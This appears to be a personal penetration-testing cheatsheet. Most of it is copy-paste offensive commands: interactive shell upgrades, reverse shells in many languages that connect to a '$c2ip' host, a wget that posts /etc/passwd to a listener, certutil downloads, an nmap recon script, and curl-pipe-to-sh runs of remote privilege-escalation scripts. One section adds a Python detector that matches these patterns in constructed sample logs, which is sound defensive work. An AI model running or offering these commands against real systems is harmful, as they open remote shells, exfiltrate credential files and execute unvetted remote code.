To see the world, things dangerous to come to, to see behind walls, draw closer, to find each other and to feel. That is the purpose of life.
– Life Magazine
A simple cheatsheet that is useful to me.
```
# Spawn / upgrade to an interactive shell
python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
# Python
echo os.system('/bin/bash')
/bin/sh -i
/bin/bash -i
perl -e 'exec "/bin/sh";'
# vi / vim
:!bash
:set shell=/bin/bash
:shell
# nmap (old versions with interactive mode)
nmap --interactive
!sh
# Lua
os.execute('/bin/sh')
# Perl (inside a script)
exec "/bin/sh";
# Ruby (inside a script)
exec "/bin/sh"
```
```
# Bash
bash -i >& /dev/tcp/$c2ip/$c2port 0>&1
0<&196;exec 196<>/dev/tcp/$c2ip/$c2port; sh <&196 >&196 2>&196
# Perl
perl -e 'use Socket;$i="$c2ip";$p=$c2port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"$c2ip:$c2port");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"$c2ip:$c2port");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
# Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$c2ip",$c2port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
# PHP
php -r '$sock=fsockopen("$c2ip",$c2port);exec("/bin/sh -i <&3 >&3 2>&3");'
# Ruby
ruby -rsocket -e'f=TCPSocket.open("$c2ip",$c2port).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("$c2ip","$c2port");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
ruby -rsocket -e 'c=TCPSocket.new("$c2ip","$c2port");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
# Netcat
nc -e /bin/sh $c2ip $c2port
nc -c /bin/sh $c2ip $c2port
/bin/sh | nc $c2ip $c2port
rm -f /tmp/p; mknod /tmp/p p && nc $c2ip $c2port 0</tmp/p | /bin/sh 1>/tmp/p
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $c2ip $c2port >/tmp/f
# Telnet
rm -f /tmp/p; mknod /tmp/p p && telnet $c2ip $c2port 0</tmp/p | /bin/sh 1>/tmp/p
telnet $c2ip $c2port | /bin/bash | telnet $c2ip $c2port # Remember to listen on your machine also on port $c2port/tcp
```

Groovy (Java `Runtime.exec`):

```
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/$c2ip/$c2port;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
```
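Seen from the blue-team side, every one-liner above leaves a recognisable footprint in process command-line telemetry (auditd `execve`, EDR process events, shell history). The following is an added example, not part of this cheatsheet: a small Python detector whose regexes are derived directly from the commands listed above (`/dev/tcp/`, `pty.spawn`, `nc -e`, `mkfifo`/`mknod` pipes, scripting-language socket-plus-exec patterns, telnet relays, `nmap --interactive`). The log format `pid=<n> user=<u> cmd=<command line>` and the log lines themselves are constructed for the example; the patterns are illustrative, not a complete rule set.

```python
import re

# Indicator patterns derived from the reverse-shell and shell-upgrade one-liners
# above. Each entry is (label, compiled regex), matched against a raw process
# command line. Illustrative only: some listed variants (e.g. "/bin/sh | nc")
# are deliberately not covered here.
INDICATORS = [
    ("bash /dev/tcp redirection", re.compile(r"/dev/tcp/")),
    ("pty.spawn tty upgrade", re.compile(r"pty\.spawn\(")),
    ("nc -e/-c bound shell", re.compile(r"\bnc\b.*\s-[ec]\s+/bin/(ba)?sh\b")),
    ("named-pipe shell (mkfifo/mknod)",
     re.compile(r"\b(mkfifo|mknod)\s+\S+.*\|\s*(/bin/)?(ba)?sh\b")),
    ("scripting-language socket + exec",
     re.compile(r"(IO::Socket::INET|fsockopen|TCPSocket|socket\.socket)"
                r".*(exec|subprocess|popen|system)")),
    ("telnet relay shell", re.compile(r"\btelnet\b.*\|\s*/bin/(ba)?sh\b.*\|")),
    ("nmap --interactive shell escape", re.compile(r"\bnmap\s+--interactive\b")),
]

# Constructed sample telemetry (hypothetical format: pid=<n> user=<u> cmd=<cmdline>).
SAMPLE_LOG = [
    "pid=1201 user=www-data cmd=bash -i >& /dev/tcp/10.0.0.5/4444 0>&1",
    "pid=1202 user=alice cmd=python3 -m http.server 8000",
    "pid=1203 user=www-data cmd=python3 -c 'import pty;pty.spawn(\"/bin/bash\")'",
    "pid=1204 user=bob cmd=nc -z localhost 22",
    "pid=1205 user=www-data cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.5 4444 >/tmp/f",
    "pid=1206 user=root cmd=ls -la /tmp",
    "pid=1207 user=www-data cmd=perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,\"10.0.0.5:4444\");"
    "STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'",
]


def parse_line(line):
    """Split one constructed log line into pid, user and the raw command line.

    Returns None for lines that do not carry a cmd= field.
    """
    head, sep, cmd = line.partition(" cmd=")
    if not sep:
        return None
    fields = dict(kv.split("=", 1) for kv in head.split())
    return {"pid": int(fields["pid"]), "user": fields["user"], "cmd": cmd}


def classify(cmd):
    """Return the labels of every indicator that matches the command line."""
    return [label for label, rx in INDICATORS if rx.search(cmd)]


def scan_log(lines):
    """Return (pid, user, labels) for each log line that triggers an indicator."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        labels = classify(rec["cmd"])
        if labels:
            findings.append((rec["pid"], rec["user"], labels))
    return findings


if __name__ == "__main__":
    for pid, user, labels in scan_log(SAMPLE_LOG):
        print(f"pid={pid} user={user}: {', '.join(labels)}")
```

Matching on the command line alone is noisy in the general case (an admin may legitimately use `mkfifo`), so in a real pipeline these labels would be combined with context such as the parent process (a web server or database worker spawning a shell) and an outbound connection from the same pid.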
```
# Serve files from the current directory
python -m SimpleHTTPServer 80
python3 -m http.server 80
python -m pyftpdlib -p 21   # FTP
# Fetch a file from the server
wget http://<ip>:<port>/stuff.txt
# Netcat: the listener redirects the incoming stream into a new file, the sender pushes it
nc -nvlp <port> > file
nc <ip> <port> < file
# HTTP POST upload to a listener; the captured file starts with the HTTP headers, so strip them afterwards
wget --post-file=/etc/passwd <ip>:<port>
tail -n +10 file > clean_file   # delete transfer data (the captured HTTP headers)
```

Windows (cmd):

```
C:\Users\<user>>certutil -urlcache -f http://<ip>:<port>/secrets.txt secrets.txt
C:\Users\<user>>ftp
ftp> get <file>
```

Quick port discovery followed by a service scan of only the open ports:

```
#!/bin/bash
# Usage: reconnaissance.sh <target> [extra nmap args...]
echo "Obtaining ports..."
ports=$(nmap -p- --min-rate 1000 -T4 "$1" | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
[ -n "$ports" ] || { echo "No open ports found"; exit 1; }
echo "Ports obtained!"
echo "Scanning..."
nmap -sC -sV -Pn -p "$ports" "$1" $2 $3
```

```
reconnaissance.sh 192.168.1.1 -oX nmap.xml
```
Linux Enumeration

```
curl -L https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | sh
```

Linux Privilege Escalation Awesome Script

```
curl -L https://n4pst3r.me/linpeas.sh | sh
```

Windows Privilege Escalation Awesome Script

Download the GitHub repo (winPEAS lives in the `winPEAS` directory of PEASS-ng):

```
git clone https://github.com/carlospolop/PEASS-ng
```

Follow the instructions on how to build your own executable, or use the default ones (x64/x86).
Then download winPEAS to the system you want to test and run it as winpeas.exe.
Social | Link |
---|---|
Github | @LudovicoLoreti |